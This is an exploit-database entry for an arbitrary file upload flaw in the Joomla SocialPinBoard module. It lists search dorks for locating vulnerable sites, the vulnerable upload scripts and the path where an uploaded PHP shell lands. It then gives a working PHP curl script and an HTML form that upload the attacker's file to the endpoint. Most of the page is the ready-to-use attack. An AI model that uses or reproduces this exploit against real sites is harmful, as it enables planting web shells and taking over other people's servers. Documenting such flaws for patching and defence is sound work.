Advertisement
| CVE | Category | Price | Severity |
|---|---|---|---|
| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
Joomla SocialPinBoard Arbitrary File Upload ################################# #TItle: SocialPinBoard AFU (Arbitrary File Upload) #Author: Con7ext #Tested On Windows Xp And Linux Ubuntu #Dork: #inurl:/index.php?option=com_socialpinboard #Powered By Socialpinboard #index of /mod_socialpinboard_menu/ #index of /socialpinboard/ #inurl:/modules/ "Socialpinboard" ################################ Path Of Exploit: /modules/mod_socialpinboard_menu/saveimagefromupload.php Or modules/mod_socialpinboard_menu/upload-file.php Path Of Shell:/modules/mod_socialpinboard_menu/images/socialpinboard/temp/RANDOMresult.php Exploit (PHP): <?php $uploadfile="low.php"; $ch = curl_init("http://www.Con7ext-security.com/modules/mod_socialpinboard_menu/saveimagefromupload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('uploadfile'=>"@$uploadfile"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Exploit (HTML): <html> <body> <form method="POST" action="http://www.Con7ext-security.com/modules/mod_socialpinboard_menu/saveimagefromupload.php" enctype="multipart/form-data"> <input type="file" name="uploadfile" /><button>Upload</button> </form> </body> </html>
Copyright ©2024 Exploitalert.